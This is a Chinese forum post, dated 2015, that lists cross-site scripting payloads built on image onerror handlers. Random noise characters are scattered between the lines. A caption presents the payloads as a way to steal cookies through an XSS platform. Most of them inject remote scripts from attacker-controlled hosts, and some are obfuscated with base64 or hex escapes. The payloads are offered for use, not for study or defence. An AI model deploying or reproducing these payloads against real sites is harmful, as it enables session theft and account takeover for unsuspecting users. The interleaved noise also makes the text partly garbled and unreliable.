<img src='non-exist.jpg'onerror="alert('xss')">
2 [+ L3 U0 [, f4 Z" \5 N<img src=# onerror=alert(123)>
0 Q9 K$ Z! h) Y8 `* n5 h<img src=# onerror=alert(document.cookie)>
/ r, D# N, W% t2 A$ n: x v下面是利用平台钓cookie的$ D- ^: i% ^+ w3 H% B
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>4 |5 M6 J, g/ q% M# W6 n
f% F" x( J: s$ t6 }, I) D
1 P7 h$ y' Z! C( g% Y* W' o5 i<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
+ S- b ]& |0 C7 g<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>& e' B0 ^0 V- ~0 o
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>+ l- g; L9 U f" s( b
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
# l) _7 M8 T# |<img src="#"># q. N/ n9 f: D# {- N8 Y
<img src="#">
8 u" T j9 \. v8 m p- R<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>3 T6 D, r3 j4 f. H5 Q
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
5 P/ ~# w) Z% q0 [% F7 @' J+ Y<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
- Y. h$ S( C9 t ^: R5 S! y+ f<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
/ ~5 l: f; N$ n/ ~$ m<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>/ Q2 X3 b1 u: C* q1 [$ p) Z, a. E
<img src=x width="0" height="0"></img>$ C% M v; r3 T: D7 @7 r6 |
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
% W- }; \& e- k E) V) x% y<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>; N% W# F$ y1 a1 C* a6 S
|
发表于 2015-10-18 14:33:54
收藏
支持
反对